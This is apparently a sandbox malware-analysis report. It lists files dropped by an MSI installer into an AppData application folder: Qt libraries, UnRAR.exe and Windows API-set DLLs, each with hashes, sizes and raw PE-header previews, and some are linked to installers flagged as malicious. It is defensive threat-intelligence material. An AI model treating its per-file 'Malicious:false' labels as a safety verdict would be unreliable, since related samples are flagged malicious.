                  Entropy (8bit):6.768974406997125
                  Encrypted:false
                  SSDEEP:24576:rQxuvY6hIkcPb0MjcrjPhTYlACiTIo+K5:PvY6Ok6bRjcrjpNCi
                  MD5:BD321BE1EB5632AE45D3A5AC225ED207
                  SHA1:29DF3B9B64D00DE00E7D0FBBFB3EB6DA5079DA95
                  SHA-256:0C12EF0D1211395992764F7218D59168B7CACE3E98BC6742F11E316BB0017ED6
                  SHA-512:91EA812A2321BA1953C83DDA4314909A21ADAC6C4BD1EFF49EC830A31C9D657666FF8C3E58599CF55AA02BDBE0232CA3F3A7F7CE0BB776AAC22B0CFB05F6401A
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....................................................................`...@......@............... ..................................L........k.......(......l....D..T...........................................................P...H............text............................... ..`.data........ ......................@....reloc..l...........................@..B............................................0.......................<.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............d...............?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........R.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Core.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):7442360
                  Entropy (8bit):6.552193329590098
                  Encrypted:false
                  SSDEEP:98304:vIBxuKe1WAIIaUtXf4Pju4I38BWGny6gPBereJsv6tWKFdu9CJ54+1jYKi2:va+IpNHtiBPJsv6tWKFdu9CJ5ljZ
                  MD5:3DC9596998EBAC48A1EA9D5557649EEB
                  SHA1:16115408BAB17885AD9BF95810DBD7A35F159E4A
                  SHA-256:3880E50AB6E204B9FBC2952FF39411A530612DDCBD82C296D916065F37B755E6
                  SHA-512:7A6641B3F8BCFBE165AEB8F7477F931188E58A72BAE63DFE2BA1C86736CDC6C7F6C86C0D433BADB64F3C799202A2F5439EAB0F04362B5B882F7F5C346F9765F9
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Joe Sandbox View:
                  • Filename: Xih96kXne2.msi, Detection: malicious, Browse
                  • Filename: setup.msi, Detection: malicious, Browse
                  • Filename: 0Q9vOYCeed.msi, Detection: malicious, Browse
                  • Filename: f1kqfrs9ME.msi, Detection: malicious, Browse
                  • Filename: tArE72wLqu.msi, Detection: malicious, Browse
                  • Filename: 52bwxFx7YB.msi, Detection: malicious, Browse
                  • Filename: Uvaz36EMnI.msi, Detection: malicious, Browse
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........W.......!...$..2...W..8............2....f..........................X.....F.q...@... .......................Q.......V..4....W.8.................... W..a...........................xC.....................4.V.|............................text.....2.......2.................`.P`.data...0.....2.......2.............@.p..rdata..(.....3.......2.............@.`@/4............D......pD.............@..@/20......j...@H..l... H.............@.0@.bss.....7....Q.......................`..edata........Q.......Q.............@.0@.idata...4....V..6...HV.............@.0..CRT....,.....V......~V.............@.0..tls..........W.......V.............@.0..rsrc...8.....W.......V.............@.0..reloc...a... W..b....V.............@.0B/30...........X.......W.............@.0B........................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Gui.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):10025108
                  Entropy (8bit):6.557228014843588
                  Encrypted:false
                  SSDEEP:98304:t+ysdIiPAgcsxId4UlbrqmH2Vgn4G5wXAsxwo+34v3e/KfiP8EEi88tV/ky:tpC1xnUlSmHk3Q3P4v3e/5jd8c
                  MD5:B6B0178576EE844019D0F2FA214DF8C8
                  SHA1:6BB884F83BEAC17F42597160D321D4AD2BD3C6C2
                  SHA-256:455E4487B294C9648F2F4852AB68BA5D45E880BD1E8CF3D27E58150C2AEDB20C
                  SHA-512:E214E6232D4F2469769AF243B01CDE10E72EF1ACDAD1E92FE1E9CF7B74FD127831BC223A3AD983695F35E4EADFAFF49110948D63E085C551094F534E33E04AB4
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........t.;......!...$.RV...t..j...........pV....f..........................u......C....@... ......................`k......@r......@s.8....................Ps..k..........................T.\.....................`Tr. ............................text....PV......RV.................`.P`.data........pV......VV.............@.`..rdata..<.....V......pV.............@.`@/4..........@^.......^.............@.0@.bss....Ti....j.......................`..edata.......`k.......j.............@.0@.idata.......@r.......q.............@.0..CRT....,.... s.......r.............@.0..tls.........0s.......r.............@.0..rsrc...8....@s.......r.............@.0..reloc...k...Ps..l....r.............@.0B/14...........u.......t.............@.0B................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Network.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):2659737
                  Entropy (8bit):6.30949898168907
                  Encrypted:false
                  SSDEEP:49152:A4VgWXiPh6PNc1ad3vQSwAaR7v2YL25Gwv:A4VgWX3PNcAd3vJwA/R
                  MD5:883D51FF2FA63084FEF0B252C62B259C
                  SHA1:375993CA6C25195302CFF56DA2A7F70ED116B681
                  SHA-256:699225B460328CC4D6F026A57B89472DB56AEF46A242066C83F4C404AB9F386D
                  SHA-512:DBED13D06AF7CB25C3CBE6F02BE3663125A6A340E0F82E565F32D66448296AF6188F98C1082D5110BE567788C04F47EF402BC730CA4D5EB0FC29E3BC527A31F8
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........x...K.....!...$.D...r...............`....@m................................/.)...@... ...................... ...9...`..$.... ..@....................0...............................;.......................n...............................text....C.......D..................`.P`.data........`.......H..............@.@..rdata..X'...p...(...N..............@.`@/4......tS.......T...v..............@.0@.bss..................................`..edata...9... ...:..................@.0@.idata..$....`......................@.0..CRT....,...........................@.0..tls................................@.0..rsrc...@.... ......................@.0..reloc.......0......................@.0B/14..................v..............@.0B................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Svg.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):597245
                  Entropy (8bit):6.137457917094125
                  Encrypted:false
                  SSDEEP:6144:PE/B6BjS+7rCDkiEOp4sNGCQFgy0zU7szKR+vAqDrT+6Nl2SaN38coanV0dLVPky:PEZ6BjSuuhEXLFrauwAj6XTaIp
                  MD5:B015508D22A275D220481547617F74BF
                  SHA1:B65EB8773297D988CE034795E95D1455DD1F09E2
                  SHA-256:CF928B42713F1AE39FD6A3F084BA3AAA4D28CEF7CFCD57DDD3E2883214FA6E91
                  SHA-512:02ADEA4881CA255CEF289B357EEFCC0C989FB0AD9E2A211B508BDBAEA9D4BECDD030615BD68ECD7696B0B5FD8C6EFC6580C4F05147F455B6B6155D3FD01397B0
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........8..,......!...$.6...2...............P.....m......................................@... ..........................Q......xr......8........................'................................................. ...l............................text....5.......6..................`.P`.data...p....P.......:..............@.0..rdata..tG...`...H...<..............@.`@/4......`...........................@.0@.bss.........p........................@..edata...Q.......R...@..............@.0@.idata..xr.......t..................@.0..CRT....,....`......................@.0..tls.........p......................@.0..rsrc...8...........................@.0..reloc...'.......(..................@.0B/14..................6..............@.0B................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Widgets.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):9420034
                  Entropy (8bit):6.528044007940559
                  Encrypted:false
                  SSDEEP:98304:CVK7i1613Ha2feb5iQrCZsSiBRRJYr8Odlr+7++i50TSAyYpdwu+IwDkXir/fE8j:CVh1AQrCZcTOi7BW2sLCbPPMvmues
                  MD5:CDF811C8E5FC6B313C91B19D2362DC2C
                  SHA1:26CC74948B8082C3A2E2F348BDFF903954974EC0
                  SHA-256:DA173CE470873CC18134DBA881F8018656CA0AD03FB0CB5A3EA8552B8785F9DE
                  SHA-512:322DA5B6063A03F599F3FDF3E0F86EB541912B9DD7AE4DC9E4FF10B8133C8E3797EBD9F31872F403C257D6456EDD7ECA2D28915396D3AEFAF549816A4B59AE8A
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........vf........!...$..?..pf...............?...@f..........................f.....Cw....@... .......................Z.......a.......d.@.................... d...............................I.....................|.a.x(...........................text...p.?.......?.................`.P`.data...8.....?.......?.............@.`..rdata..<^....?..`....?.............@.`@/4............L.......K.............@.0@.bss....8.....Z.......................@..edata........Z.......Z.............@.0@.idata........a.......a.............@.0..CRT....,.....c.......c.............@.0..tls..........d.......c.............@.0..rsrc...@.....d.......c.............@.0..reloc....... d.......c.............@.0B/14...........f......tf.............@.0B................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\UnRAR.exe

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):506008
                  Entropy (8bit):6.4284173495366845
                  Encrypted:false
                  SSDEEP:6144:yY8mmN3YWYGAj9JwXScp39ioIKzKVEKfr01//bbh3S62Wt3A3ksFqXqjh6AusDyn:yY8XiWYGAkXh3Qqia/zAot3A6AhezSpK
                  MD5:98CCD44353F7BC5BAD1BC6BA9AE0CD68
                  SHA1:76A4E5BF8D298800C886D29F85EE629E7726052D
                  SHA-256:E51021F6CB20EFBD2169F2A2DA10CE1ABCA58B4F5F30FBF4BAE931E4ECAAC99B
                  SHA-512:D6E8146A1055A59CBA5E2AAF47F6CB184ACDBE28E42EC3DAEBF1961A91CEC5904554D9D433EBF943DD3639C239EF11560FA49F00E1CFF02E11CD8D3506C4125F
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g.}............|.&.....|.$.J...|.%.....H}*.....H}./....H}./.....~P.....H}./.....~D.........z...F}./....F}(.....F}./....Rich............PE..d.....@f.........."....!.b.....................@.....................................'....`.................................................|...........H........4.......(......8...0I..T....................J..(....G..@............................................text....a.......b.................. ..`.rdata...3.......4...f..............@..@.data...............................@....pdata...4.......6..................@..@_RDATA..\...........................@..@.rsrc...H...........................@..@.reloc..8...........................@..B................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-console-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):12224
                  Entropy (8bit):6.596101286914553
                  Encrypted:false
                  SSDEEP:192:4nWYhWxWWFYg7VWQ4uWjXUtpwBqnajrmaaGJ:2WYhWvZqlQGJ
                  MD5:919E653868A3D9F0C9865941573025DF
                  SHA1:EFF2D4FF97E2B8D7ED0E456CB53B74199118A2E2
                  SHA-256:2AFBFA1D77969D0F4CEE4547870355498D5C1DA81D241E09556D0BD1D6230F8C
                  SHA-512:6AEC9D7767EB82EBC893EBD97D499DEBFF8DA130817B6BB4BCB5EB5DE1B074898F87DB4F6C48B50052D4F8A027B3A707CAD9D7ED5837A6DD9B53642B8A168932
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...Y.=i.........." .........................................................0......a.....`.........................................`...,............ ...................!..............T............................................................................rdata..P...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-console-l1-2-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):12224
                  Entropy (8bit):6.640081558424349
                  Encrypted:false
                  SSDEEP:192:iTWYhWyWWFYg7VWQ4uWq6Cu87ZqnajgnLSyu:sWYhWi1XHllk2yu
                  MD5:7676560D0E9BC1EE9502D2F920D2892F
                  SHA1:4A7A7A99900E41FF8A359CA85949ACD828DDB068
                  SHA-256:00942431C2D3193061C7F4DC340E8446BFDBF792A7489F60349299DFF689C2F9
                  SHA-512:F1E8DB9AD44CD1AA991B9ED0E000C58978EB60B3B7D9908B6EB78E8146E9E12590B0014FC4A97BC490FFE378C0BF59A6E02109BFD8A01C3B6D0D653A5B612D15
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d....y1..........." .........................................................0...........`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-datetime-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):11712
                  Entropy (8bit):6.6023398138369505
                  Encrypted:false
                  SSDEEP:192:5WYhWYWWFYg7VWQ4SWSS/njxceXqnajLJ35H:5WYhW4gjmAlnJpH
                  MD5:AC51E3459E8FCE2A646A6AD4A2E220B9
                  SHA1:60CF810B7AD8F460D0B8783CE5E5BBCD61C82F1A
                  SHA-256:77577F35D3A61217EA70F21398E178F8749455689DB52A2B35A85F9B54C79638
                  SHA-512:6239240D4F4FA64FC771370FB25A16269F91A59A81A99A6A021B8F57CA93D6BB3B3FCECC8DEDE0EF7914652A2C85D84D774F13A4143536A3F986487A776A2EAE
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d.....Ab.........." .........................................................0......d.....`.........................................`................ ...................!..............T............................................................................rdata..4...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-debug-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):11720
                  Entropy (8bit):6.614262942006268
                  Encrypted:false
                  SSDEEP:192:4WYhWFsWWFYg7VWQ4eWZzAR/BVrqnajcJH:4WYhWFMJRLlA5
                  MD5:B0E0678DDC403EFFC7CDC69AE6D641FB
                  SHA1:C1A4CE4DED47740D3518CD1FF9E9CE277D959335
                  SHA-256:45E48320ABE6E3C6079F3F6B84636920A367989A88F9BA6847F88C210D972CF1
                  SHA-512:2BADF761A0614D09A60D0ABB6289EBCBFA3BF69425640EB8494571AFD569C8695AE20130AAC0E1025E8739D76A9BFF2EFC9B4358B49EFE162B2773BE9C3E2AD4
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................." .........................................................0............`.........................................`................ ...................!..............T............................................................................rdata..@...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-errorhandling-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):11720
                  Entropy (8bit):6.654155040985372
                  Encrypted:false
                  SSDEEP:192:imxD3vEWYhWnWWFYg7VWQ4eWMOwNbDXbBqnaj0qJm8:iIEWYhWFpLbBlwqJm
                  MD5:94788729C9E7B9C888F4E323A27AB548
                  SHA1:B0BA0C4CF1D8B2B94532AA1880310F28E87756EC
                  SHA-256:ACCDD7455FB6D02FE298B987AD412E00D0B8E6F5FB10B52826367E7358AE1187
                  SHA-512:AB65495B1D0DD261F2669E04DC18A8DA8F837B9AC622FC69FDE271FF5E6AA958B1544EDD8988F017D3DD83454756812C927A7702B1ED71247E506530A11F21C6
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d....:.[.........." .........................................................0......~.....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-file-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):15304
                  Entropy (8bit):6.548897063441128
                  Encrypted:false
                  SSDEEP:192:+AuVYPvVX8rFTsRWYhWyWWFYg7VWQ4eWQBAW+JSdqnajeMoLR9au:TBPvVXLWYhWiBdlaLFAu
                  MD5:580D9EA2308FC2D2D2054A79EA63227C
                  SHA1:04B3F21CBBA6D59A61CD839AE3192EA111856F65
                  SHA-256:7CB0396229C3DA434482A5EF929D3A2C392791712242C9693F06BAA78948EF66
                  SHA-512:97C1D3F4F9ADD03F21C6B3517E1D88D1BF9A8733D7BDCA1AECBA9E238D58FF35780C4D865461CC7CD29E9480B3B3B60864ABB664DCDC6F691383D0B281C33369
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................." .........................................................@............`.........................................`................0...................!..............T............................................................................rdata..(...........................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-file-l1-2-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):11712
                  Entropy (8bit):6.622041192039296
                  Encrypted:false
                  SSDEEP:192:dzWYhW1sWWFYg7VWQ4yWL3sQlmqnajlD4h1N:BWYhW2e6l94h1N
                  MD5:35BC1F1C6FBCCEC7EB8819178EF67664
                  SHA1:BBCAD0148FF008E984A75937AADDF1EF6FDA5E0C
                  SHA-256:7A3C5167731238CF262F749AA46AB3BFB2AE1B22191B76E28E1D7499D28C24B7
                  SHA-512:9AB9B5B12215E57AF5B3C588ED5003D978071DC591ED18C78C4563381A132EDB7B2C508A8B75B4F1ED8823118D23C88EDA453CD4B42B9020463416F8F6832A3D
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................." .........................................................0......./....`.........................................`...L............ ...................!..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-file-l2-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):11720
                  Entropy (8bit):6.730719514840594
                  Encrypted:false
                  SSDEEP:192:/VyWYhWjAWWFYg7VWQ4eWiuNwzNbDXbBqnaj0q:/VyWYhW8g+LbBlwq
                  MD5:3BF4406DE02AA148F460E5D709F4F67D
                  SHA1:89B28107C39BB216DA00507FFD8ADB7838D883F6
                  SHA-256:349A79FA1572E3538DFBB942610D8C47D03E8A41B98897BC02EC7E897D05237E
                  SHA-512:5FF6E8AD602D9E31AC88E06A6FBB54303C57D011C388F46D957AEE8CD3B7D7CCED8B6BFA821FF347ADE62F7359ACB1FBA9EE181527F349C03D295BDB74EFBACE
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0............`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-handle-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):11720
                  Entropy (8bit):6.626458901834476
                  Encrypted:false
                  SSDEEP:192:P9RWYhWEWWFYg7VWQ4eWncTjxceXqnajLJS:LWYhWk3TjmAlnJS
                  MD5:BBAFA10627AF6DFAE5ED6E4AEAE57B2A
                  SHA1:3094832B393416F212DB9107ADD80A6E93A37947
                  SHA-256:C78A1217F8DCB157D1A66B80348DA48EBDBBEDCEA1D487FC393191C05AAD476D
                  SHA-512:D5FCBA2314FFE7FF6E8B350D65A2CDD99CA95EA36B71B861733BC1ED6B6BB4D85D4B1C4C4DE2769FBF90D4100B343C250347D9ED1425F4A6C3FE6A20AED01F17
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...>G.j.........." .........................................................0............`.........................................`...`............ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-heap-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):12232
                  Entropy (8bit):6.577869728469469
                  Encrypted:false
                  SSDEEP:192:5t6DjZlTIWYhWsWWFYg7VWQ4eW4MtkR/BVrqnajc:5t6Dll0WYhWMqkRLlA
                  MD5:3A4B6B36470BAD66621542F6D0D153AB
                  SHA1:5005454BA8E13BAC64189C7A8416ECC1E3834DC6
                  SHA-256:2E981EE04F35C0E0B7C58282B70DCC9FC0318F20F900607DAE7A0D40B36E80AF
                  SHA-512:84B00167ABE67F6B58341045012723EF4839C1DFC0D8F7242370C4AD9FABBE4FEEFE73F9C6F7953EAE30422E0E743DC62503A0E8F7449E11C5820F2DFCA89294
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0......M.....`.........................................`................ ...................!..............T............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-interlocked-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):11712
                  Entropy (8bit):6.6496318655699795
                  Encrypted:false
                  SSDEEP:192:nWYhWNWWFYg7VWQ4uWtGDlR/BVrqnajcU8:nWYhWLJDlRLlAU8
                  MD5:A038716D7BBD490378B26642C0C18E94
                  SHA1:29CD67219B65339B637A1716A78221915CEB4370
                  SHA-256:B02324C49DD039FA889B4647331AA9AC65E5ADC0CC06B26F9F086E2654FF9F08
                  SHA-512:43CB12D715DDA4DCDB131D99127417A71A16E4491BC2D5723F63A1C6DFABE578553BC9DC8CF8EFFAE4A6BE3E65422EC82079396E9A4D766BF91681BDBD7837B1
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...*............." .........................................................0......-.....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-libraryloader-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):12736
                  Entropy (8bit):6.587452239016064
                  Encrypted:false
                  SSDEEP:192:FvuBL3BBLZWYhWxWWFYg7VWQ4uW4g0jrQYcunYqnajv9Ml:FvuBL3BPWYhWv8jYulhMl
                  MD5:D75144FCB3897425A855A270331E38C9
                  SHA1:132C9ADE61D574AA318E835EB78C4CCCDDEFDEA2
                  SHA-256:08484ED55E43584068C337281E2C577CF984BB504871B3156DE11C7CC1EEC38F
                  SHA-512:295A6699529D6B173F686C9BBB412F38D646C66AAB329EAC4C36713FDD32A3728B9C929F9DCADDE562F625FB80BC79026A52772141AD2080A0C9797305ADFF2E
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d......c.........." .........................................................0......V`....`.........................................`................ ...................!..............T............................................................................rdata..<...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-localization-l1-2-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):14280
                  Entropy (8bit):6.658205945107734
                  Encrypted:false
                  SSDEEP:384:NOMw3zdp3bwjGzue9/0jCRrndbwNWYhW6WAulh2:NOMwBprwjGzue9/0jCRrndbw5D
                  MD5:8ACB83D102DABD9A5017A94239A2B0C6
                  SHA1:9B43A40A7B498E02F96107E1524FE2F4112D36AE
                  SHA-256:059CB23FDCF4D80B92E3DA29E9EF4C322EDF6FBA9A1837978FD983E9BDFC7413
                  SHA-512:B7ECF60E20098EA509B76B1CC308A954A6EDE8D836BF709790CE7D4BD1B85B84CF5F3AEDF55AF225D2D21FBD3065D01AA201DAE6C131B8E1E3AA80ED6FC910A4
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0......._....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-memory-l1-1-0.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):12224
                  Entropy (8bit):6.621310788423453
                  Encrypted:false
                  SSDEEP:96:qo1aCFEWYhWwp/DEs39DHDs35FrsvYgmr0DD0ADEs3TDL2L4m2grMWaLNpDEs3OC:teWYhWVWWFYg7VWQ4yWwAKZRqnajl6x7
                  MD5:808F1CB8F155E871A33D85510A360E9E
                  SHA1:C6251ABFF887789F1F4FC6B9D85705788379D149
                  SHA-256:DADBD2204B015E81F94C537AC7A36CD39F82D7C366C193062210C7288BAA19E3
                  SHA-512:441F36CA196E1C773FADF17A0F64C2BBDC6AF22B8756A4A576E6B8469B4267E942571A0AE81F4B2230B8DE55702F2E1260E8D0AFD5447F2EA52F467F4CAA9BC6
                  Malicious:false
                  Antivirus:
